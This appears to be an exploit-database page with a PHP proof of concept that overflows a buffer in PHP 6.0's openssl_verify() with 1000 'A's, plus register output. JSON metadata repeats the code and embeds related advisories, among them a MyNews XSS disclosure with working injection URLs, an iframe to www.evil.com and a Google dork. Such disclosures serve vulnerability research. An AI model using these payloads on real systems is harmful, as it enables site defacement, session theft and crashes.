Search...

PHP 6.0 openssl_verify() Local Buffer Overflow PoC

2012-07-20T00:00:00

ID 1337DAY-ID-19032
Type zdt
Reporter Yakir Wizman
Modified 2012-07-20T00:00:00

Description

Exploit for windows platform in category dos / poc

                                        
                                            &lt;?php
// ==================================================================================
//
// PHP 6.0 openssl_verify() Local Buffer Overflow PoC
//
// Tested on WIN XP, Apache, PHP 6.0dev. Local Buffer Overflow.
//
// Local Buffer Overflow
// Author: Pr0T3cT10n &lt;[email protected]&gt;
//
// ==================================================================================
//
// REGISTERS:
// EAX 000003D0, ECX 00BBDB28, EDX 00BBDAD8
// EBX 00BBC940, ESP 0012FB5C UNICODE "AAA...."
// ESI 00BBC940, EDI 00831D00, EBP 0012FBF0 UNICODE "AAA...."
// EIP 00410041
//
// ==================================================================================
 
$buffer = str_repeat("A", 1000);
openssl_verify(1,1,$buffer);
?&gt;



#  0day.today [2018-04-05]  #

JSON Vulners Source

Initial Source

{"hash": "ffb79a2ee9ce9855baeaecc1d359d04750a203afcc3c8f4443a3bc271668c26b", "id": "1337DAY-ID-19032", "lastseen": "2018-04-05T21:44:53", "viewCount": 3, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "b0d3d3a91f21189719037cf41ad6dbfa", "key": "description"}, {"hash": "3aa29b09587d845f10ca0ed3d4d42e2c", "key": "href"}, {"hash": "9c5a8f2ef03b47facd4049259ce36b6b", "key": "modified"}, {"hash": "9c5a8f2ef03b47facd4049259ce36b6b", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "2a8617994a9f0fc732764414874428c1", "key": "reporter"}, {"hash": "ec6ce82aab2f6dd4c77f0f279b156b7f", "key": "sourceData"}, {"hash": "469880953c541725307cd346ad0ecfb6", "key": "sourceHref"}, {"hash": "a5cd4eadf9ecf539e22b3e4eae416989", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}, "dependencies": {"references": [], "modified": "2018-04-05T21:44:53"}, "vulnersScore": 7.2}, "type": "zdt", "sourceHref": "https://0day.today/exploit/19032", "description": "Exploit for windows platform in category dos / poc", "title": "PHP 6.0 openssl_verify() Local Buffer Overflow PoC", "history": [{"bulletin": {"hash": "e7ceb88d7e569175c08ae818f1c95b540c15f47c2dccfb826a2fb6a705f940bd", "id": "1337DAY-ID-19032", "lastseen": "2016-04-20T01:23:21", "enchantments": {"score": {"value": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/", "modified": "2016-04-20T01:23:21"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "2a8617994a9f0fc732764414874428c1", "key": "reporter"}, {"hash": "6db7ce69a6145fca13f898af9e7106c8", "key": "sourceData"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "340ee096bc48f5aa135bca9f6512e36d", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "9c5a8f2ef03b47facd4049259ce36b6b", "key": "published"}, {"hash": "b0d3d3a91f21189719037cf41ad6dbfa", "key": "description"}, {"hash": "9c5a8f2ef03b47facd4049259ce36b6b", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "6a585f48724bd9329f1b4f56bfd37516", "key": "sourceHref"}, {"hash": "a5cd4eadf9ecf539e22b3e4eae416989", "key": "title"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/19032", "description": "Exploit for windows platform in category dos / poc", "viewCount": 0, "title": "PHP 6.0 openssl_verify() Local Buffer Overflow PoC", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "<?php\r\n// ==================================================================================\r\n//\r\n// PHP 6.0 openssl_verify() Local Buffer Overflow PoC\r\n//\r\n// Tested on WIN XP, Apache, PHP 6.0dev. Local Buffer Overflow.\r\n//\r\n// Local Buffer Overflow\r\n// Author: Pr0T3cT10n <pr0t3ct10n@gmail.com>\r\n//\r\n// ==================================================================================\r\n//\r\n// REGISTERS:\r\n// EAX 000003D0, ECX 00BBDB28, EDX 00BBDAD8\r\n// EBX 00BBC940, ESP 0012FB5C UNICODE \"AAA....\"\r\n// ESI 00BBC940, EDI 00831D00, EBP 0012FBF0 UNICODE \"AAA....\"\r\n// EIP 00410041\r\n//\r\n// ==================================================================================\r\n \r\n$buffer = str_repeat(\"A\", 1000);\r\nopenssl_verify(1,1,$buffer);\r\n?>\r\n\r\n\n\n# 0day.today [2016-04-20] #", "published": "2012-07-20T00:00:00", "references": [], "reporter": "Yakir Wizman", "modified": "2012-07-20T00:00:00", "href": "http://0day.today/exploit/description/19032"}, "lastseen": "2016-04-20T01:23:21", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "<?php\r\n// ==================================================================================\r\n//\r\n// PHP 6.0 openssl_verify() Local Buffer Overflow PoC\r\n//\r\n// Tested on WIN XP, Apache, PHP 6.0dev. Local Buffer Overflow.\r\n//\r\n// Local Buffer Overflow\r\n// Author: Pr0T3cT10n <[email\u00a0protected]>\r\n//\r\n// ==================================================================================\r\n//\r\n// REGISTERS:\r\n// EAX 000003D0, ECX 00BBDB28, EDX 00BBDAD8\r\n// EBX 00BBC940, ESP 0012FB5C UNICODE \"AAA....\"\r\n// ESI 00BBC940, EDI 00831D00, EBP 0012FBF0 UNICODE \"AAA....\"\r\n// EIP 00410041\r\n//\r\n// ==================================================================================\r\n \r\n$buffer = str_repeat(\"A\", 1000);\r\nopenssl_verify(1,1,$buffer);\r\n?>\r\n\r\n\n\n# 0day.today [2018-04-05] #", "published": "2012-07-20T00:00:00", "references": [], "reporter": "Yakir Wizman", "modified": "2012-07-20T00:00:00", "href": "https://0day.today/exploit/description/19032"}

{"securityvulns": [{"lastseen": "2018-08-31T11:10:24", "bulletinFamily": "software", "description": "I know its basic, but I am a supporter of FD and therefore \r\nplanetluc.com has to be\r\nblamed now! I checked their script MyNews in version 1.6.4 today and \r\nthen some\r\nother versions, all are vulnerable to HTML and JS injection.\r\n\r\n--- ADVISORY ---\r\n\r\n----------------------------\r\n|| WWW.SMASH-THE-STACK.NET ||\r\n-----------------------------\r\n\r\n|| ADVISORY: MyNews 1.6.X HTML/JS Injection Vulnerability\r\n\r\n_____________________\r\n|| 0x00: ABOUT ME\r\n|| 0x01: DATELINE\r\n|| 0x02: INFORMATION\r\n|| 0x03: EXPLOITATION\r\n|| 0x04: GOOGLE DORK\r\n|| 0x05: RISK LEVEL\r\n____________________________________________________________\r\n____________________________________________________________\r\n\r\n_________________\r\n|| 0x00: ABOUT ME\r\n\r\nAuthor: SkyOut\r\nDate: February 2008\r\nContact: skyout[-at-]smash-the-stack[-dot-]net\r\nWebsite: http://www.smash-the-stack.net/\r\n\r\n_________________\r\n|| 0x01: DATELINE\r\n\r\n2008-02-06: Bug found\r\n2008-02-06: Advisory released\r\n\r\n____________________\r\n|| 0x02: INFORMATION\r\n\r\nThe MyNews script by planetluc.com in all versions of the 1.6.X tree is\r\nvulnerable to HTML and JS injection due to no sanitation of the "hash"\r\nvalue in combination with the action "admin".\r\n\r\n_____________________\r\n|| 0x03: EXPLOITATION\r\n\r\nNo exploit is needed to test this vulnerability. You just need a working\r\nweb browser.\r\n\r\n1: HTML Injection\r\n\r\nTo make a HTML injectioni, visit the websites main page. The name \r\nmight differ\r\nfrom the original name "mynews.inc.php", mostly its called \r\n"index.php". Now\r\nconstruct a malformed URL as follows:\r\n\r\nhttp://www.example.com/index.php?hash="><iframe src=http:// \r\nwww.evil.com/ height=500px width=500px></iframe><!--&do=admin\r\n\r\nOf course you can manipulate the values of "height" and "width" like you\r\nwant to. Do it the way it best fits to your needs!\r\n\r\n2: JavaScript Injection\r\n\r\nJS injection is similar to HTML injection, just that you put a JS code\r\nin the "hash" parameter. Let me show you two examples:\r\n\r\nhttp://www.example.com/index.php?hash="><script>alert(1337);</ \r\nscript><!--&do=admin\r\n\r\nor\r\n\r\nhttp://www.example.com/index.php?hash="><script>alert("XSS");</ \r\nscript><!--&do=admin\r\n\r\nSometimes using strings doesn't work, so test it first!\r\n\r\n____________________\r\n|| 0x04: GOOGLE DORK\r\n\r\nintext:"powered by MyNews 1.6.*"\r\n\r\n___________________\r\n|| 0x05: RISK LEVEL\r\n\r\n- LOW - (1/3) -\r\n\r\n<!> Happy Hacking <!>\r\n\r\n____________________________________________________________\r\n____________________________________________________________\r\n\r\nTHE END\r\n\r\n--- ADVISORY ---\r\n\r\nSincerely,\r\nSkyOut\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "modified": "2008-02-07T00:00:00", "published": "2008-02-07T00:00:00", "id": "SECURITYVULNS:DOC:19032", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:19032", "title": "[Full-disclosure] MyNews 1.6.X HTML/JS Injection Vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:28", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2008-02-07T00:00:00", "published": "2008-02-07T00:00:00", "id": "SECURITYVULNS:VULN:8646", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:8646", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:16", "bulletinFamily": "software", "description": "\r\nTITLE:\r\nRaidenHTTPD Script Source Disclosure Vulnerability\r\n\r\nSECUNIA ADVISORY ID:\r\nSA19032\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/19032/\r\n\r\nCRITICAL:\r\nModerately critical\r\n\r\nIMPACT:\r\nExposure of sensitive information\r\n\r\nWHERE:\r\n>From remote\r\n\r\nSOFTWARE:\r\nRaidenHTTPD 1.x\r\nhttp://secunia.com/product/4614/\r\n\r\nDESCRIPTION:\r\nSecunia Research has discovered a vulnerability in RaidenHTTPD, which\r\ncan be exploited by malicious people to disclose potentially sensitive\r\ninformation.\r\n\r\nThe vulnerability is caused due to a validation error of the filename\r\nextension supplied by the user in the URL. This can be exploited to\r\nretrieve the source code of script files (e.g. PHP) from the server\r\nvia specially crafted requests containing dot, space and slash\r\ncharacters.\r\n\r\nThe vulnerability has been confirmed in version 1.1.47. Prior\r\nversions may also be affected.\r\n\r\nSOLUTION:\r\nUpdate to version 1.1.48.\r\nhttp://www.raidenhttpd.com/en/download.html\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\nTan Chew Keong, Secunia Research\r\n\r\nORIGINAL ADVISORY:\r\nSecunia Research:\r\nhttp://secunia.com/secunia_research/2006-15/\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.\r\n", "modified": "2006-03-03T00:00:00", "published": "2006-03-03T00:00:00", "id": "SECURITYVULNS:DOC:11688", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:11688", "title": "[SA19032] RaidenHTTPD Script Source Disclosure Vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}